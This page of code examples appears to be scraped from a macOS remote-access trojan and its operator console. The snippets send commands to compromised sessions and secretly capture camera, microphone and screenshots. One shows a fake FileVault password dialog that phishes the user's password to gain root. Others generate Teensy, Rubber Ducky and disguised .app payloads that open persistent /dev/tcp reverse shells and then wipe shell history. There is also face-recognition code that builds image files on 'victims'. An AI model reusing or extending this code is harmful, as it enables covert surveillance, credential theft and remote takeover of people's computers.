예제 #1
0
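    def interact(self):
        """Run the operator console loop until ``exit`` or Ctrl-C.

        Reads one line at a time with ``raw_input``; the first whitespace
        separated token is the command and the remainder (stripped) is its
        argument.  Unknown commands are reported and the loop continues.
        Both ``exit`` and ``KeyboardInterrupt`` stop the server and return.

        Splitting with ``split(None, 1)`` replaces the old ``len(cmd)`` slice,
        which produced a wrong argument when the line had leading blanks, and
        a whitespace-only line is now skipped instead of raising IndexError.
        """
        h.info_general("Listening on port {0}...".format(self.server.port))
        h.info_general("Type \"help\" for commands")
        # Handlers that receive the argument string.
        with_args = {
            "interact": self.interact_with_session,
            "close": self.close_session,
        }
        # Handlers that take no argument.
        no_args = {
            "sessions": self.list_sessions,
            "help": self.show_commands,
        }
        while True:
            try:
                input_data = raw_input(self.handle)
                parts = input_data.split(None, 1)
                if not parts:
                    # Empty or whitespace-only line: nothing to dispatch.
                    continue
                cmd = parts[0]
                args = parts[1].strip() if len(parts) > 1 else ""
                if cmd == "exit":
                    self.stop_server()
                    return
                if cmd in with_args:
                    with_args[cmd](args)
                elif cmd in no_args:
                    no_args[cmd]()
                else:
                    h.info_error("Invalid Command: " + cmd)
            except KeyboardInterrupt:
                sys.stdout.write("\n")
                self.stop_server()
                return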
예제 #2
0
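    def run(self,session,cmd_data):
        """Request a camera capture from the session and save it locally.

        ``cmd_data['args']`` must be ``"front"`` or ``"back"``; anything else
        prints the usage text.  The argument is rewritten to a boolean
        (``True`` for front) before the command is sent.  On a ``success``
        reply the announced number of bytes is read from the session socket
        and written to ``downloads/<front|back>_<timestamp>.jpg``.

        The file is opened in binary mode (``'wb'``, like the other download
        commands) and closed via a context manager even if the write fails.
        """
        camera = cmd_data['args']
        if camera not in ("front", "back"):
            print(self.usage)
            return
        # The agent expects a boolean flag: True = front camera, False = back.
        use_front = camera == "front"
        cmd_data['args'] = use_front
        h.info_general("Taking picture...")
        try:
            response = json.loads(session.send_command(cmd_data))
            if 'success' in response:
                size = int(response["size"])
                prefix = "front" if use_front else "back"
                file_name = "{0}_{1}.jpg".format(prefix, int(time.time()))
                data = session.sock_receive_data(size)
                h.info_general("Saving {0}".format(file_name))
                # JPEG bytes must not go through newline translation.
                with open(os.path.join('downloads', file_name), 'wb') as f:
                    f.write(data)
                h.info_general("Saved to ./downloads/{0}".format(file_name))
            elif 'error' in response:
                h.info_error(response['error'])
            else:
                h.info_error("Unexpected error")
        except Exception as e:
            print(e)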
예제 #3
0
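 def upload_file(self, file_path, remote_dir, remote_file_name):
     """Send a local file to the agent in 1 KiB chunks.

     The transfer is framed as an ``upload`` command whose ``args`` carry the
     byte size, the remote directory and the remote file name, followed by
     the raw file contents and finally a random 16-byte hex terminator that
     was announced in the command.  A missing local file is reported and
     nothing is sent.

     The file handle is now closed (the original never closed it) and the
     chunk count uses integer division so it is an int on Python 3 as well.
     """
     term = binascii.hexlify(os.urandom(16))
     if not os.path.exists(file_path):
         h.info_error("Local file: " + file_path + " does not exist")
         return
     with open(file_path, "rb") as f:
         data = f.read()
     size = len(data)
     cmd_data = json.dumps({
         "cmd": "upload",
         "args": json.dumps({
             "size": size,
             "path": remote_dir,
             "filename": remote_file_name
         }),
         "term": term
     })
     self.sock_send(cmd_data)
     chunk_size = 1024
     # (size // 1024) + 1 iterations reproduces the original framing,
     # including a trailing empty chunk when size is a multiple of 1024.
     for i in range((size // chunk_size) + 1):
         start = i * chunk_size
         self.sock_send(data[start:start + chunk_size])
     self.sock_send(term)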
 def show_session(self, session):
     """Print one line for ``session``: id, user@host and peer IP address.

     Any failure while reading the session fields or the socket peer name is
     reported through ``h.info_error`` instead of propagating.
     """
     try:
         session_label = str(session.id)
         who = session.username + "@" + session.hostname
         peer_ip = str(session.conn.getpeername()[0])
         print(" | ".join([session_label, who, peer_ip]))
     except Exception as e:
         h.info_error(str(e))
예제 #5
0
 def interact_with_session(self, session_number):
     """Hand the console over to the session with the given number.

     ``session_number`` is the raw string typed by the operator; an empty
     value prints the usage line.  Any failure (non-numeric input, an unknown
     id, or an exception raised inside the session's own ``interact``) is
     reported as "Invalid Session" by the bare except.
     """
     if not session_number:
         print("Usage: interact (session number)")
         return
     try:
         index = int(session_number)
         target = self.sessions_id[index]
         target.interact()
     except:
         h.info_error("Invalid Session")
예제 #6
0
 def run(self,session,cmd_data):
     """Send a directory change and record the session's new working directory.

     The agent replies with JSON: an ``error`` key is shown to the operator,
     a ``current_directory`` key updates ``session.current_directory``
     (UTF-8 encoded), and anything else is reported as a failure.
     """
     reply = json.loads(session.send_command(cmd_data))
     if 'error' in reply:
         h.info_error(reply['error'])
         return
     if 'current_directory' in reply:
         session.current_directory = reply['current_directory'].encode('utf-8')
         return
     h.info_error('Unable to get current directory!')
예제 #7
0
	def interact_with_session(self,session_number):
		"""Switch the console to session ``session_number`` (a string).

		Prints the usage line for an empty argument.  Every failure, i.e. a
		non-numeric argument, an unknown session id, or an exception raised by
		the session's own ``interact``, is reported as "not found".
		"""
		if not session_number:
			print("Usage: interact <session>")
			return
		try:
			index = int(session_number)
			self.sessions_id[index].interact()
		except:
			h.info_error("Session "+session_number+" is not found!")
예제 #8
0
	def interact_with_session(self,session_number):
		"""Attach the console to the session numbered ``session_number``.

		An empty argument prints the usage line.  Any exception, whether from
		converting the number, looking up the session, or the session's own
		``interact``, is reported as an invalid session number.
		"""
		if not session_number:
			print("Usage: Interact + [Session Number]")
			return
		try:
			chosen = self.sessions_id[int(session_number)]
			chosen.interact()
		except:
			h.info_error("Invalid Session Number. Please Put The Correct Session Number.")
	def run(self,server):
		"""Write a Teensy/Arduino sketch to payloads/teensy_macos/teensy_macos.ino.

		Asks whether the generated command should be persistent, builds the
		shell command from ``server.host`` and ``server.port``, and embeds it
		in a sketch that types it into a macOS Terminal through the Keyboard
		library.  Only the source file is written; nothing is executed here.
		"""
		while 1:
			persistence = raw_input(h.info_question_raw("Make Persistent? (y/N): ")).lower()
			if persistence == "y":
				# Looping variant: retried every 5 seconds, backgrounded.
				shell_command = "while true; do $(bash &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1); sleep 5; done & "
				break
			elif persistence == "n" or not persistence:
				# An empty answer selects this one-shot variant.
				shell_command = "bash &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1;"
				break
			else:
				h.info_error("Unrecognized option!")

		# Same suffix for both variants: wipe shell history and close Terminal.
		shell_command += "history -wc;killall Terminal"
		if os.path.exists("payloads") == False:
			os.mkdir("payloads")
		if os.path.exists("payloads/teensy_macos") == False:
			os.mkdir("payloads/teensy_macos")
		payload_save_path = "payloads/teensy_macos/teensy_macos.ino"
		# NOTE(review): shell_command is spliced into a C string literal without
		# escaping; it currently contains no double quotes or backslashes.
		payload = """\
#include "Keyboard.h"
const int LED = 13;
void setup() {
	pinMode(LED, OUTPUT);
	Serial.begin(9600);
	delay(1000); //delay to establish connection
	Keyboard.set_modifier(MODIFIERKEY_GUI);
	Keyboard.set_key1(KEY_SPACE);
	Keyboard.send_now();
	Keyboard.set_modifier(0);
	Keyboard.set_key1(0);
	Keyboard.send_now();
	delay(200);
	Keyboard.print("terminal");
	delay(1000);
	keyEnter();
	delay(1000);
	Keyboard.print(\""""+shell_command+"""\");
	keyEnter();
}

void keyEnter() {
	Keyboard.set_key1(KEY_ENTER);
	Keyboard.send_now();
	//release
	Keyboard.set_key1(0);
	Keyboard.send_now();
}

void loop() {
	digitalWrite(LED, HIGH);
	delay(100);
	digitalWrite(LED, LOW);
	delay(100);
}"""
		f = open(payload_save_path,"w")
		f.write(payload)
		f.close()
		h.info_general("Payload saved to " + payload_save_path)
 def interact_with_session(self, session_number, cmd_data):
     """Forward ``cmd_data`` to the numbered session and return its result.

     An empty ``session_number`` prints the usage line and returns ``None``.
     Any exception from the lookup or from the session's ``interact`` is
     reported as "Invalid Session" and ``None`` is returned.
     """
     if not session_number:
         print("Usage: interact (session number)")
         return None
     try:
         index = int(session_number)
         return self.sessions_id[index].interact(cmd_data)
     except:
         h.info_error("Invalid Session")
     return None
예제 #11
0
 def close_session(self, session_number):
     """Disconnect the session identified by ``session_number`` (a string).

     Empty input prints the usage line; any failure while converting the
     number, looking up the session or disconnecting it is reported as an
     invalid session number.
     """
     if not session_number:
         print("Usage: close <session_number>")
         return
     try:
         index = int(session_number)
         self.sessions_id[index].disconnect(False)
         h.info_general('Closing session ' + session_number + '...')
     except:
         h.info_error("Invalid session number!")
예제 #12
0
	def close_session(self,session_number):
		"""Terminate the session numbered ``session_number`` (a string).

		Empty input prints the usage line.  On any exception the exception
		itself is printed, followed by an invalid-number message.
		"""
		if not session_number:
			print("Usage: Terminate + [Session Number]")
			return
		try:
			index = int(session_number)
			self.sessions_id[index].disconnect(False)
			h.info_general('Terminating Session ' + session_number)
		except Exception as e:
			print(e)
			h.info_error("Invalid Session Number. Please Put The Correct Session Number.")
 def close_session(self, session_number):
     """Close the session numbered ``session_number`` (a string).

     Empty input prints the usage line.  On any exception the exception is
     printed and the session is reported as invalid.
     """
     if not session_number:
         print("Usage: close (session number)")
         return
     try:
         index = int(session_number)
         self.sessions_id[index].disconnect(False)
         h.info_general('Closing session ' + session_number)
     except Exception as e:
         print(e)
         h.info_error("Invalid Session")
예제 #14
0
 def run(self, session, cmd_data):
     """Send an install/uninstall request and report any error text returned.

     Only ``"install"`` and ``"uninstall"`` are accepted in
     ``cmd_data['args']``; anything else prints the usage text without
     contacting the session.  A non-empty reply is treated as an error.
     """
     progress = {"install": "Installing...", "uninstall": "Uninstalling..."}
     action = cmd_data['args']
     if action not in progress:
         print(self.usage)
         return
     h.info_general(progress[action])
     result = session.send_command(cmd_data)
     if result:
         h.info_error(result)
예제 #15
0
 def run(self, session, cmd_data):
     """Interactive remote shell loop for ``session``.

     Each line the operator types is sent to the agent as a ``cmd``/``args``
     pair built from its first token and the rest of the line.  ``cd`` and
     ``ls`` get local handling: ``cd`` updates ``session.current_directory``
     from the JSON reply and ``ls`` prints a sorted listing.  ``exit`` leaves
     the loop.  Because the final ``else`` pairs only with the ``exit`` check,
     ``cd`` and ``ls`` are sent to the agent a second time and that second
     result is discarded.  Ctrl-C while a command is in flight sends
     ``killtask`` to the agent.  ``cmd_data`` is not used.
     """
     while 1:
         # Prompt suffix mirrors a local shell: '#' for uid 0, '$' otherwise.
         # uid[:-1] assumes the echo reply carries exactly one trailing newline.
         uid = session.send_command({"cmd": "echo", "args": "$UID"})
         if uid[:-1] == "0":
             whoami = "# "
         else:
             whoami = "$ "
         shell = raw_input(h.ENDC + session.hostname + ":" +
                           session.current_directory + " " +
                           session.username + whoami)
         # Skips empty and space-only lines; a tabs-only line still reaches
         # split()[0] below and raises IndexError.
         if not shell or shell.replace(" ", "") == "":
             continue
         shelld = shell.split()[0]
         # len(shelld) + 1 skips the command and one separator; leading
         # whitespace on the line would leave part of the command in args.
         shelld_data = {"cmd": shelld, "args": shell[len(shelld) + 1:]}
         if shelld == "cd":
             result = json.loads(session.send_command(shelld_data))
             if 'error' in result:
                 h.info_error(result['error'])
             elif 'current_directory' in result:
                 session.current_directory = result[
                     'current_directory'].encode('utf-8')
             else:
                 h.info_error('Unable to get current directory!')
         if shelld == "ls":
             if not shelld_data['args']:
                 shelld_data['args'] = '.'
             data = session.send_command(shelld_data)
             try:
                 contents = json.loads(data)
             except:
                 # Non-JSON reply: print it raw and leave the shell entirely.
                 print data
                 return
             keys = contents.keys()
             keys.sort()
             for k in keys:
                 # Entries valued 4 or 10 are highlighted; presumably dirent
                 # d_type values (DT_DIR=4, DT_LNK=10) -- confirm with the agent.
                 if contents[k] == 4 or contents[k] == 10:
                     print h.COLOR_INFO + k + h.ENDC
                 else:
                     print k
         if shelld == "exit":
             return
         else:
             # Reached for every command except exit, including cd and ls,
             # whose reply is deliberately ignored here.
             try:
                 result = session.send_command(shelld_data)
                 if result:
                     if shelld == "ls" or shelld == "cd":
                         pass
                     else:
                         print result.rstrip()
             except KeyboardInterrupt:
                 session.send_command({"cmd": "killtask"})
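 def run(self, session, cmd_data):
     """Request a screenshot from the agent and save it under ``downloads/``.

     The agent answers with JSON: ``error`` is reported and nothing is saved;
     ``size`` announces how many image bytes follow on the socket, which are
     written as ``screenshot_<timestamp>.jpg``.  A reply carrying neither key
     is now reported instead of being ignored silently, and the output file
     is closed via a context manager even if the write fails.
     """
     result = json.loads(session.send_command(cmd_data))
     if 'error' in result:
         h.info_error(result['error'])
         return
     if 'size' not in result:
         h.info_error("Unexpected response from session")
         return
     size = int(result['size'])
     data = session.sock_receive_data(size)
     file_name = "screenshot_{0}.jpg".format(int(time.time()))
     h.info_general("Saving {0}".format(file_name))
     with open(os.path.join('downloads', file_name), 'wb') as f:
         f.write(data)
     h.info_general("Saved to ./downloads/{0}".format(file_name))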
예제 #17
0
    def run(self,session,cmd_data):
        """Send the AppleScript dialog below to the session, then optionally try ``eggsu``.

        The script is sent as an ``applescript`` command and the agent's reply
        is printed as-is.  If the operator then answers yes (the default) to
        the root prompt, the reply text is escaped for single-quoted shell use
        and sent with the ``eggsu`` command; a result containing ``root``
        triggers a session refresh (``update_session`` on a single-session
        server, ``needs_refresh`` otherwise).  Always returns ``""``.
        """
        payload = """
        tell application "Finder"
            activate

            set myprompt to "Type your password to allow System Preferences to make changes"
                        
            set ans to "Cancel"

            repeat
                try
                    set d_returns to display dialog myprompt default answer "" with hidden answer buttons {"Cancel", "OK"} default button "OK" with icon path to resource "FileVaultIcon.icns" in bundle "/System/Library/CoreServices/CoreTypes.bundle"
                    set ans to button returned of d_returns
                    set mypass to text returned of d_returns
                    if mypass > "" then exit repeat
                end try
            end repeat
                        
            try
                do shell script "echo " & quoted form of mypass
            end try
        end tell
        """
        cmd_data.update({"cmd":"applescript","args":payload})
        password = session.send_command(cmd_data).strip()
        #display response
        print h.COLOR_INFO+"[*] "+h.WHITE+"Response: "+h.GREEN+password+h.WHITE
        #prompt for root
        tryroot = raw_input("Would you like to try for root? (Y/n) ")
        # Empty answer defaults to "y".
        tryroot = tryroot if tryroot else "y"
        if tryroot.lower() != "y":
            return ""
        #TODO: I am so lazy, probably should use the su command
        # Backslashes first, then single quotes; presumably the agent wraps
        # the argument in single quotes -- cannot be confirmed from here.
        password = password.replace("\\","\\\\").replace("'","\\'")
        cmd_data.update({"cmd":"eggsu","args":password})
        result = session.send_command(cmd_data)
        if "root" in result:
            h.info_general("Root Granted!")
            time.sleep(0.2)
            h.info_general("Escalating Privileges...")
            if session.server.is_multi == False:
                session.server.update_session(session)
            else:
                session.needs_refresh = True
        else:
            h.info_error("Failed getting root!")
        return ""
    def identify_victim(self, session_id):
        """Match the face captured by session ``session_id`` against the person database.

        Returns ``True`` when the victim record is already marked identified or
        becomes identified now; ``False`` for an id below 1, a recognition
        result other than ``"Ok"``, a face id with no database mapping, or any
        exception (reported through ``h.info_error``).  A match appends a
        ``{'session_id', 'profile'}`` record to ``self.identified_victims`` and
        bumps its counter; the victim record is flagged identified even when
        the mapped name has no profile row.
        """
        if session_id < 1:
            h.info_error("Invalid Session")
            return False
        try:
            record = self.victims['victims'][session_id - 1]
            if record['identified']:
                return True

            capture = self.sessions_id[session_id].init_interact()
            reply = json.loads(faceRec(capture))
            h.info_general("Face Rec Result:")
            print(reply)
            if reply['status'] != "Ok":
                print("No Face Rec result")
                return False

            print(reply['faceId'])
            face_id = reply['faceId']
            face_to_person = self.faceid_mapping['FaceToPerson']
            if face_id not in face_to_person:
                print("Person not in Database")
                return False

            wanted_name = face_to_person[face_id]
            profile = next(
                (p for p in self.person_db['Person'] if p['name'] == wanted_name),
                None)
            if profile is not None:
                self.identified_victims['identified_victims'].append(
                    {'session_id': session_id, 'profile': profile})
                self.identified_victims['total_identified_victims'] += 1
            record['identified'] = True
            return True
        except:
            h.info_error("Person cannot be recognized")
            return False
    def run(self, server):
        """Write a Rubber Ducky script to payloads/rubber_duck/payload.txt.

        Asks whether the generated command should be persistent, builds the
        shell command from ``server.host`` and ``server.port``, and embeds it
        in a keystroke script that opens a macOS Terminal and types it.  Only
        the text file is written; nothing is executed here.
        """
        while 1:
            persistence = raw_input(
                h.info_question_raw("Make Persistent? (y/N): ")).lower()
            if persistence == "y":
                # Looping variant: retried every 5 seconds, backgrounded.
                shell_command = "while true; do $(bash &> /dev/tcp/" + str(
                    server.host) + "/" + str(
                        server.port) + " 0>&1); sleep 5; done & "
                # shell_clean is assigned but never read; the same text is
                # appended to shell_command below.
                shell_clean = "history -wc;killall Terminal"
                break
            elif persistence == "n" or not persistence:
                # An empty answer selects this one-shot variant.
                shell_command = "bash &> /dev/tcp/" + str(
                    server.host) + "/" + str(server.port) + " 0>&1;"
                shell_clean = "history -wc;killall Terminal"
                break
            else:
                h.info_error("Unrecognized option!")

        # Same suffix for both variants: wipe shell history and close Terminal.
        shell_command += "history -wc;killall Terminal"
        if os.path.exists("payloads") == False:
            os.mkdir("payloads")
        if os.path.exists("payloads/rubber_duck") == False:
            os.mkdir("payloads/rubber_duck")
        payload_save_path = "payloads/rubber_duck/payload.txt"
        # shell_command is inserted verbatim as a STRING line of the script.
        payload = """\
DELAY 500
COMMAND SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 500
STRING """ + shell_command + """
DELAY 500
ENTER
DELAY 500
"""
        f = open(payload_save_path, "w")
        f.write(payload)
        f.close()
        h.info_general("Payload saved to " + payload_save_path)
예제 #20
0
    def run(self, server):
        """Build a macOS .app bundle under payloads/macos_application/ from resources/payload.app.

        Prompts for an application name, an icon path and whether the shell
        command should be persistent; copies the template bundle, renames it
        to ``<name>.app``, installs the icon, and writes the shell command as
        ``Contents/MacOS/payload.sh`` (made executable).  ``server.host`` and
        ``server.port`` are embedded in the command.
        """
        while 1:
            # All three prompts sit inside the loop, so an unrecognised answer
            # asks for the name and icon again as well.
            name = raw_input(h.info_general_raw("Application Name> "))
            icon = raw_input(h.info_general_raw("Application Icon> "))
            persistence = raw_input(
                h.info_general_raw("Make Persistent? (y/N): ")).lower()
            if persistence == "y":
                # Looping variant: retried every 5 seconds, backgrounded.
                shell_command = "while true; do $(bash &> /dev/tcp/" + str(
                    server.host) + "/" + str(
                        server.port) + " 0>&1); sleep 5; done & "
                break
            elif persistence == "n" or not persistence:
                # An empty answer selects this one-shot variant.
                shell_command = "bash &> /dev/tcp/" + str(
                    server.host) + "/" + str(server.port) + " 0>&1;"
                break
            else:
                h.info_error("invalid option: " + persistence)

        if os.path.exists("payloads") == False:
            os.mkdir("payloads")
        # The template bundle is copied only when this directory did not exist
        # yet; on a later run with a different name the open() below fails
        # because that .app directory was never created.
        # NOTE(review): name and icon are interpolated into the os.system()
        # commands unquoted, so spaces or shell metacharacters in either value
        # break the commands.
        if os.path.exists("payloads/macos_application") == False:
            os.mkdir("payloads/macos_application")
            os.system("""
cp -r resources/payload.app payloads/macos_application
mv payloads/macos_application/payload.app payloads/macos_application/""" +
                      name + """.app
mv """ + icon + """ payloads/macos_application/""" + name +
                      """.app/Contents/Resources/payload.icns
                        """)
        payload_save_path = "payloads/macos_application/" + name + ".app/Contents/MacOS/payload.sh"
        # Bundle path, used only for the final status message.
        sas = "payloads/macos_application/" + name + ".app"
        payload = """\
#! /usr/bin/env bash
""" + shell_command + """
                """
        f = open(payload_save_path, "w")
        f.write(payload)
        f.close()
        h.info_general("Payload saved to " + sas)
        os.system("chmod +x payloads/macos_application/" + name +
                  ".app/Contents/MacOS/payload.sh")
예제 #21
0
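    def run(self, session, cmd_data):
        """Control microphone recording on the session: ``record`` or ``stop``.

        ``record`` forwards the command and prints the agent's reply.  ``stop``
        expects a JSON reply: ``error`` is reported; ``status == 1`` means a
        recording is available, in which case ``/tmp/.avatmp`` is downloaded
        from the session and saved as ``downloads/mic<timestamp>.caf``.  Any
        other argument prints the usage line.

        The output file is closed via a context manager even if the write
        fails; a stale commented-out print was dropped.
        """
        action = cmd_data["args"]
        if action == "record":
            h.info_general(session.send_command(cmd_data))
            return
        if action != "stop":
            print("Usage: mic record/stop")
            return
        # "stop": the agent answers with JSON.
        result = json.loads(session.send_command(cmd_data))
        if 'error' in result:
            h.info_error("Error: " + result['error'])
            return
        if 'status' in result and result['status'] == 1:
            data = session.download_file("/tmp/.avatmp")
            file_name = "mic{0}.caf".format(int(time.time()))
            h.info_general("Saving {0}".format(file_name))
            with open(os.path.join('downloads', file_name), 'wb') as f:
                f.write(data)
            h.info_general("Saved to ./downloads/{0}".format(file_name))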
    def init_interact_with_session(self):
        """Run face recognition for the newest session and record the matched person.

        Uses ``self.new_session_id``; ids below 1 print the usage line.  The
        session's ``init_interact`` yields an image file, ``faceRec`` returns a
        JSON string, and a recognised face id that maps to a known person
        stores that person under ``self.victims[new_session_id]`` and sets
        ``self.victims_modify`` (the last matching profile row wins).  Any
        exception is reported as an invalid session.
        """
        session_id = self.new_session_id
        if session_id < 1:
            print("Usage: interact (session number)")
            return
        try:
            image_file = self.sessions_id[session_id].init_interact()
            reply = json.loads(faceRec(image_file))
            if reply['status'] == "Ok":
                print(reply['faceId'])
                face_id = reply['faceId']
            else:
                print("no data match")
                face_id = ""
            face_to_person = self.faceid_mapping['FaceToPerson']
            if face_id in face_to_person:
                wanted_name = face_to_person[face_id]
                for person in self.person_db['Person']:
                    if person['name'] == wanted_name:
                        self.victims[session_id] = person
                        self.victims_modify = True
        except:
            h.info_error("Invalid Session")
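    def save_images(self, session_id, filename):
        """Copy a captured picture into the identified victim's personal folder.

        ``filename`` is read from ``./DB/pictures/`` and re-encoded with PIL
        (quality 10) into ``./DB/<name>/Images/<filename>``, where ``<name>``
        comes from the matching entry in ``self.identified_victims``.  Sessions
        that are not yet identified, or have no matching entry, are reported
        and skipped; all failures are reported via ``h.info_error`` rather
        than raised.

        The loop variable no longer shadows ``victim`` and the success message
        now has a space after "Saved to".
        """
        if session_id < 1:
            h.info_error("Invalid Session")
            return
        try:
            victim = self.victims['victims'][session_id - 1]

            # Only identified sessions get their pictures filed away.
            if not victim['identified']:
                h.info_general("Session has not been identified")
                return

            victim_name = None
            for entry in self.identified_victims['identified_victims']:
                if entry['session_id'] == session_id:
                    victim_name = entry['profile']['name']
                    break

            if not victim_name:
                h.info_general("Haven't found the target victim")
                return

            try:
                # NOTE(review): filename is joined as-is; callers are assumed
                # to pass a bare file name.
                image_path = "./DB/pictures/" + filename
                personal_db_image_path = "./DB/" + victim_name + "/Images/"
                if not os.path.exists(personal_db_image_path):
                    os.makedirs(personal_db_image_path)
                image = Image.open(image_path)
                image.save(personal_db_image_path + filename,
                           optimize=True,
                           quality=10)
                h.info_general("Saved to " + personal_db_image_path + filename)
            except:
                h.info_error("Image save path error")
        except:
            h.info_error("Error in Saving the image")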
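    def get_all_images(self, victim_name):
        """Return the ``.jpg`` files stored for ``victim_name`` under ``DB/``.

        Returns a dict with ``images`` (file names), ``total_images`` and
        ``image_path`` (``DB/<victim_name>/Images/``, created if missing), or
        ``None`` when the name is empty, ``./DB`` cannot be listed, no
        ``./DB/<victim_name>`` folder exists, or listing the image folder
        fails.  The unreachable ``else`` branch that re-checked
        ``victim_name`` after the guard at the top was removed.
        """
        if not victim_name:
            h.info_error("Invalid victim name")
            return None

        try:
            # Best effort: an unreadable ./DB is treated as "no such victim".
            try:
                if victim_name not in os.listdir("./DB/"):
                    h.info_general("Unidentified victim")
                    return None
            except:
                return None

            try:
                personal_db_image_path = "DB/" + victim_name + "/Images/"
                if not os.path.exists(personal_db_image_path):
                    os.makedirs(personal_db_image_path)
                # Case-sensitive match, as before: only lower-case '.jpg'.
                images = [
                    f for f in os.listdir(personal_db_image_path)
                    if f.endswith('.jpg')
                ]
                return {
                    'images': images,
                    'total_images': len(images),
                    'image_path': personal_db_image_path,
                }
            except:
                h.info_error("Fetching Images Error")
                return None
        except:
            h.info_error("Error in get the images")
            return None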